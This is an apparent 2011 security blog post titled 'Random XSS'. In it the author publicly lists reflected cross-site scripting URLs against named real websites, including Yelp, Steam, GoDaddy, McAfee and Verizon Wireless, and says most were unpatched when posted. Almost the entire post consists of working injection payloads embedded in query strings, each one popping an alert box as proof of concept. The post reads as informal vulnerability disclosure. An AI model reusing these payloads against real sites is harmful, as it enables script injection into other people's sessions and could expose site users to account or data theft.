Random XSS

January 4th, 2011

I have a bad habit of saving these little random bugs and telling myself that I ‘may have a need for them later’. I think that's just the paranoid security guy in me, but then again I do the same for random little electronic parts I find. Given the fact I just cleaned out all my old parts, I figured I need to do the same for these, so here are some random XSS bugs I’ve found. As of now (Tue Jan 4 21:07:03 EST 2011) all are unpatched except for the mint.com one (on a side note, their group of guys seems great!).

https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E

http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4

https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E

https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29

https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;//

http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22

http://www.webroot.com/En_US/search-results.html?q=');alert('gerry

http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware

http://products.verizonwireless.com/index.aspx?';alert(1)//
